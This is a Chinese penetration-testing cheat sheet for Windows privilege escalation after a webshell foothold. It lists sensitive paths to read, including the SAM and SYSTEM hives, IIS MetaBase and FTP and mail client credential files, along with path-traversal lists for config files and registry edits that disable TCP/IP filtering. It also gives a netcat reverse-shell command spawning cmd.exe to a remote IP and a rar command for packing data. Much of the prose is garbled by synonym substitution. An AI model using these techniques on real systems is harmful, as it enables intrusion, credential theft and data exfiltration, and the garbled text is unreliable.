c:\windows\php.ini c:\boot.ini c:\1.txt c:\a.txt c:\CMailServer\config.ini c:\CMailServer\CMailServer.exe c:\CMailServer\WebMail\index.asp c:\program files\CMailServer\CMailServer.exe c:\program files\CMailServer\WebMail\index.asp C:\WinWebMail\SysInfo.ini C:\WinWebMail\Web\default.asp C:\WINDOWS\FreeHost32.dll C:\WINDOWS\7i24iislog4.exe C:\WINDOWS\7i24tool.exe c:\hzhost\databases\url.asp c:\hzhost\hzclient.exe C:\Documents and Settings\All Users\「初阶」菜单\程序\7i24假造主机贪图平台\积极设置[受控端].lnk C:\Documents and Settings\All Users\「初阶」菜单\程序\Serv-U\Serv-U Administrator.lnk C:\WINDOWS\网站.config c:\网站\index.html c:\www\index.html c:\WWWROOT\index.html c:\网站site\index.html c:\网站\index.asp c:\www\index.asp c:\wwwsite\index.asp c:\WWWROOT\index.asp c:\网站\index.php c:\www\index.php c:\WWWROOT\index.php c:\WWWsite\index.php c:\网站\default.html c:\www\default.html c:\WWWROOT\default.html c:\网站site\default.html c:\网站\default.asp c:\www\default.asp c:\wwwsite\default.asp c:\WWWROOT\default.asp c:\网站\default.php c:\www\default.php c:\WWWROOT\default.php c:\WWWsite\default.php C:\Inetpub\wwwroot\pagerror.gif c:\windows\notepad.exe c:\winnt\notepad.exe C:\Program Files\Microsoft Office\OFFICE10\winword.exe C:\Program Files\Microsoft Office\OFFICE11\winword.exe C:\Program Files\Microsoft Office\OFFICE12\winword.exe C:\Program Files\网络 Explorer\IEXPLORE.EXE C:\Program Files\winrar\rar.exe C:\Program Files\360\360Safe\360safe.exe C:\Program Files\360Safe\360safe.exe C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log c:\ravbin\store.ini c:\rising.ini C:\Program Files\Rising\Rav\RsTask.xml C:\Documents and Settings\All Users\Start Menu\desktop.ini C:\Documents and Settings\Administrator\My Documents\Default.rdp C:\Documents and Settings\Administrator\Cookies\index.dat C:\Documents and Settings\Administrator\My Documents\新建文本文档.txt C:\Documents and Settings\Administrator\桌面\新建文本文档.txt C:\Documents and Settings\Administrator\My Documents\1.txt C:\Documents and Settings\Administrator\桌面\1.txt C:\Documents and Settings\Administrator\My Documents\a.txt C:\Documents and Settings\Administrator\桌面\a.txt C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg E:\Inetpub\wwwroot\aspnet_client\system_网站\1_1_4322\SmartNav.htm C:\Program Files\RhinoSoft.com\Serv-U\Version.txt C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini C:\Program Files\Symantec\SYMEVENT.INF C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini C:\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm C:\Program Files\MySQL\MySQL Server 5.0\COPYING C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\bin\mysql.exe c:\MySQL\MySQL Server 4.1\data\mysql\user.frm C:\Program Files\Oracle\oraconfig\Lpk.dll C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe C:\WINDOWS\system32\inetsrv\w3wp.exe C:\WINDOWS\system32\inetsrv\inetinfo.exe C:\WINDOWS\system32\inetsrv\MetaBase.xml C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp C:\WINDOWS\system32\config\default.LOG C:\WINDOWS\system32\config\sam C:\WINDOWS\system32\config\system c:\CMailServer\config.ini c:\program files\CMailServer\config.ini c:\tomcat6\tomcat6\bin\version.sh c:\tomcat6\bin\version.sh c:\tomcat\bin\version.sh c:\program files\tomcat6\bin\version.sh C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log c:\Apache2\Apache2\bin\Apache.exe c:\Apache2\bin\Apache.exe c:\Apache2\php\license.txt C:\Program Files\Apache Group\Apache2\bin\Apache.exe c:\Program Files\QQ2007\qq.exe c:\Program Files\Tencent\, qq\User.db c:\Program Files\Tencent\qq\qq.exe c:\Program Files\Tencent\qq\bin\qq.exe c:\Program Files\Tencent\qq2009\qq.exe c:\Program Files\Tencent\qq2008\qq.exe c:\Program Files\Tencent\qq2010\bin\qq.exe c:\Program Files\Tencent\qq\Users\All Users\Registry.db C:\Program Files\Tencent\TM\TMDlls\QQZip.dll c:\Program Files\Tencent\Tm\Bin\Txplatform.exe c:\Program Files\Tencent\RTXServer\AppConfig.xml C:\Program Files\Foxmal\Foxmail.exe C:\Program Files\Foxmal\accounts.cfg C:\Program Files\tencent\Foxmal\Foxmail.exe C:\Program Files\tencent\Foxmal\accounts.cfg C:\Program Files\LeapFTP 3.0\LeapFTP.exe C:\Program Files\LeapFTP\LeapFTP.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt C:\Program Files\FlashFXP\FlashFXP.ini C:\Program Files\FlashFXP\flashfxp.exe c:\Program Files\Oracle\bin\regsvr32.exe c:\Program Files\腾讯游戏\QQGAME\readme.txt c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt c:\Program Files\tencent\QQGAME\readme.txt C:\Program Files\StormII\Storm.exe

各种网站的配置文件绝对门路大全：

Default

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

/config.php ../../config.php ../config.php ../../../config.php /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /conn.php ./conn.php ../../conn.php ../conn.php ../../../conn.php /conn.asp ./conn.asp ../../conn.asp ../conn.asp ../../../conn.asp /config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php /config/config.php ../../config/config.php ../config/config.php ../../../config/config.php /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /config/conn.php ./config/conn.php ../../config/conn.php ../config/conn.php ../../../config/conn.php /config/conn.asp ./config/conn.asp ../../config/conn.asp ../config/conn.asp ../../../config/conn.asp /config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php /data/config.php ../../data/config.php ../data/config.php ../../../data/config.php /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /data/conn.php ./data/conn.php ../../data/conn.php ../data/conn.php ../../../data/conn.php /data/conn.asp ./data/conn.asp ../../data/conn.asp ../data/conn.asp ../../../data/conn.asp /data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php /include/config.php ../../include/config.php ../include/config.php ../../../include/config.php /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /include/conn.php ./include/conn.php ../../include/conn.php ../include/conn.php ../../../include/conn.php /include/conn.asp ./include/conn.asp ../../include/conn.asp ../include/conn.asp ../../../include/conn.asp /include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php /inc/config.php ../../inc/config.php ../inc/config.php ../../../inc/config.php /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /inc/conn.php ./inc/conn.php ../../inc/conn.php ../inc/conn.php ../../../inc/conn.php /inc/conn.asp ./inc/conn.asp ../../inc/conn.asp ../inc/conn.asp ../../../inc/conn.asp /inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php /index.php ./index.php ../../index.php ../index.php ../../../index.php /index.asp ./index.asp ../../index.asp ../index.asp ../../../index.asp

去除TCP IP挑拣：

TCP/IP挑拣在注册表里有三处，分袂是：

Default

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

12345

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分袂用下列呼吁来导出注册表项：

Default

regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

12345

regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

尔后再把三个文件里的：

Default

 “EnableSecurityFilters"=dword:00000001”

1	“EnableSecurityFilters"=dword:00000001”

改为：

Default

 “EnableSecurityFilters"=dword:00000000”

1	“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分袂用下列呼吁导入注册表即可：

Default

regedit -s D:\a.reg

regedit -s D:\b.reg

regedit -s D:\c.reg

12345

regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg

Webshell 提权小才力：

Cmd门路：

Default

c:\windows\temp\cmd.exe

1	c:\windows\temp\cmd.exe

Nc 也在同目录下，譬喻反弹cmdshell：

Default

 "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

1	"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

个别都不会糜烂。

而直接在 cmd 门路上输入：

Default

c:\windows\temp\nc.exe

1	c:\windows\temp\nc.exe

呼吁输入：

Default

-vv ip 999 -e c:\windows\temp\cmd.exe

1	-vv ip 999 -e c:\windows\temp\cmd.exe

却能糜烂。。这个不是重点

咱们个别实验 pr.exe 或 Churrasco.exe 的时分也需要按照上面的方法步调手腕糜烂。

呼吁行调用 RAR 打包：

Default

rar a -k -r -s -m3 c:\1.rar c:\folde

1	rar a -k -r -s -m3 c:\1.rar c:\folde

看完了Windows版的，别错过Linux版的哦。传递门：《Linux渗透与提权：才力总结篇》

[via@0x / t00ls / lcx ]

(0)

域内网渗透小结[11-14]
远程组策略与麦咖啡的那点事[11-14]
文件上传字符截断与NC提交技巧[11-12]
渗透-细节决定成败[1][11-11]
内网渗透：利用WMI代替psexec（WMIEXEC.vbs）[11-07]
利用procdump+Mimikatz 绕过杀软获取Windows明文密[11-06]
科普-xss攻击浏览器同源策略与跨域访问[11-06]
简单易用，用Powershell劫持Windows系统快捷键；[11-05]
分布式漏洞扫描系统设计与实现[11-04]
基于SNMP的交换机入侵的内网渗透[11-04]

Windows渗透与提权：技巧总结篇

数安新闻+更多

安全资讯+更多

证书相关+更多